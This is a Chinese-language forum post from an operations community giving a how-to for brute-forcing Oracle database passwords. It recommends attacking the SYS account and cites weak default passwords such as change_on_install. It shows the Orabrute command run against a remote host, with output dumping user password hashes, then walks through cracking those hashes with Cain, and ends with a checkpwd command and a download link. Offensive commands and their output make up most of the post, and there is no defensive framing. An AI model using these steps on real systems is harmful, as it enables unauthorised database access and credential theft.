设为首页 收藏本站

运维网

 找回密码
 立即注册
查看: 966|回复: 0

[经验分享] 暴力破解Oracle数据库密码的方法

[复制链接]
含玉4616

尚未签到
发表于 2016-7-24 14:52:17 | 显示全部楼层 |阅读模式
  暴力破解Oracle数据库密码的方法

一、前提条件

要连接远程的 Oracle 数据库,需要知道 SID,用户名, 密码,当然还有最重要的 IP 地址。SID 如果被管理 员修改的话,可以利用 sidguess 来进行破解,速度非常的快,至于成功与否,就要看你的字典配置了。可以得知选择远程破解Oracle 的最好帐户是SYS,因为此帐户永远有效。在Oracle10g以前的版本在安装的时候并没有提示修改SYS 的默认密码,Oracle10g 虽然提示修改密码了,但是并没有检查密码的复杂性。

二、破解方法

1、使用Orabrute 工具来进行远程破解

可以使用Orabrute 工具来进行远程破解,在使用这个工具的时候,需要系统提前安装好Sqlplus,该工具的
原理很简单,就是不停的调用Sqlplus 然后进行登录验证,帐户选择的是SYS,密码则为password.txt 中的密码单词。只要登录成功,就会调用selectpassword.sql 脚本抓取出在SYS.USER$表中的其他用户的哈希值,然后退出程序。这里有个注意的地方,当第二次运行Orabrute 的时候,需要删除或移动同目录下的前一次运行Orabrute 时生成的thepasswordsarehere.txt 和output.txt 文件。
Orabrute 的使用方法为:

D:\soft\oracle\Orabrute>orabrute
Orabrute v 1.2 by Paul M. Wright and David J. Morgan:
orabrute <hostip> <port> <sid> <millitimewait>
D:\soft\oracle\Orabrute>

Orabrute 的破解速度比较慢,建议在password.txt开头加上诸如change_on_install这样你认为可能的密码。

D:\soft\oracle\Orabrute>orabrute 172.19.111.37 1521 orcl 2000
Orabrute v 1.2 by Paul M. Wright and David J. Morgan:
orabrute <hostip> <port> <sid> <millitimewait>sqlplus.exe -S -L "SYS/change_on_install@172.19.111.37:1521/orcl" as sysdba @selectpassword.sql

NAME PASSWORD
------------------------------ ------------------------------
SYS D4C5016086B2DC6A
PUBLIC
CONNECT
RESOURCE
DBA
SYSTEM D4DF7931AB130E37
SELECT_CATALOG_ROLE
EXECUTE_CATALOG_ROLE

2、使用Cain工具破解Oracle密码

首先,通过SQLPlus获得用户名和密码的Hash,SQL> select username,password from dba_users;

USERNAME
------------------------------------------------------------
PASSWORD
------------------------------------------------------------
SYS
8A8F025737A9097A

SYSTEM
2D594E86F93B17A1

DBSNMP
FFF45BB2C0C327EC


USERNAME
------------------------------------------------------------
PASSWORD
------------------------------------------------------------
SYSMAN
2CA614501F09FCCC

MGMT_VIEW
7967E9F7D325932C

ABC2
2BC5EEFA22EE5E5E
其次,安装Cain,安装后的截图如下:





最后,利用Cain的crack功能对Oracle的密码进行字典猜解,步骤如下:



第一步:运行cain,点击Craker中的Oracle

暴力破解Oracle数据库密码的方法



第二步:输入用户名和密码Hash,如:SYS 8A8F025737A9097A



暴力破解Oracle数据库密码的方法



第二步:点击Start,等5分钟后会发现破解的结果

暴力破解Oracle数据库密码的方法
暴力破解Oracle数据库密码的方法

破解后的密码为oracle

3、 Oracle Checkpasswd_big 破解密码


C:\oracle_checkpwd_big>checkpwd system/wy@//192.168.1.116:1521/NBO password_file

下载地址http://www.red-database-security.com/software/checkpwd.html

运维网声明 1、欢迎大家加入本站运维交流群:群②:261659950 群⑤:202807635 群⑦870801961 群⑧679858003
2、本站所有主题由该帖子作者发表,该帖子作者与运维网享有帖子相关版权
3、所有作品的著作权均归原作者享有,请您和我们一样尊重他人的著作权等合法权益。如果您对作品感到满意,请购买正版
4、禁止制作、复制、发布和传播具有反动、淫秽、色情、暴力、凶杀等内容的信息,一经发现立即删除。若您因此触犯法律,一切后果自负,我们对此不承担任何责任
5、所有资源均系网友上传或者通过网络收集,我们仅提供一个展示、介绍、观摩学习的平台,我们不对其内容的准确性、可靠性、正当性、安全性、合法性等负责,亦不承担任何法律责任
6、所有作品仅供您个人学习、研究或欣赏,不得用于商业或者其他用途,否则,一切后果均由您自己承担,我们对此不承担任何法律责任
7、如涉及侵犯版权等问题,请您及时通知我们,我们将立即采取措施予以解决
8、联系人Email:admin@iyunv.com 网址:www.yunweiku.com

所有资源均系网友上传或者通过网络收集,我们仅提供一个展示、介绍、观摩学习的平台,我们不对其承担任何法律责任,如涉及侵犯版权等问题,请您及时通知我们,我们将立即处理,联系人Email:kefu@iyunv.com,QQ:1061981298 本贴地址:https://www.yunweiku.com/thread-248743-1-1.html 上篇帖子: oracle树结构删除所有子节点 下篇帖子: ORACLE SQL性能量化(一)基础性能数据
回复

使用道具 举报

返回列表
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

扫码加入运维网微信交流群X

扫码加入运维网微信交流群

扫描二维码加入运维网微信交流群,最新一手资源尽在官方微信交流群!快快加入我们吧...

扫描微信二维码查看详情

客服 E-mail:iyunvcom@gmail.com

本站由青云提供云计算服务

运维网--中国最专业的运维工程师交流社区

豫ICP备20007574号-1 Copyright © 2012-2025

关于我们

发展历程

联系我们

关注我们

广告服务

广告案例

隐私条款

免责声明

用户登录

用户注册

版主守则

申请版主

手机版

金币获取

帮助中心

每日签到

Good Good

Study

Day Day

UP


客服E-mail:kefu@iyunv.com 客服QQ:1061981298


QQ群⑦:运维网交流群⑦ QQ群⑧:运维网交流群⑧ k8s群:运维网kubernetes交流群


提醒:禁止发布任何违反国家法律、法规的言论与图片等内容;本站内容均来自个人观点与网络等信息,非本站认同之观点.


本站大部分资源是网友从网上搜集分享而来,其版权均归原作者及其网站所有,我们尊重他人的合法权益,如有内容侵犯您的合法权益,请及时与我们联系进行核实删除!



合作伙伴: 青云cloud

快速回复 返回顶部 返回列表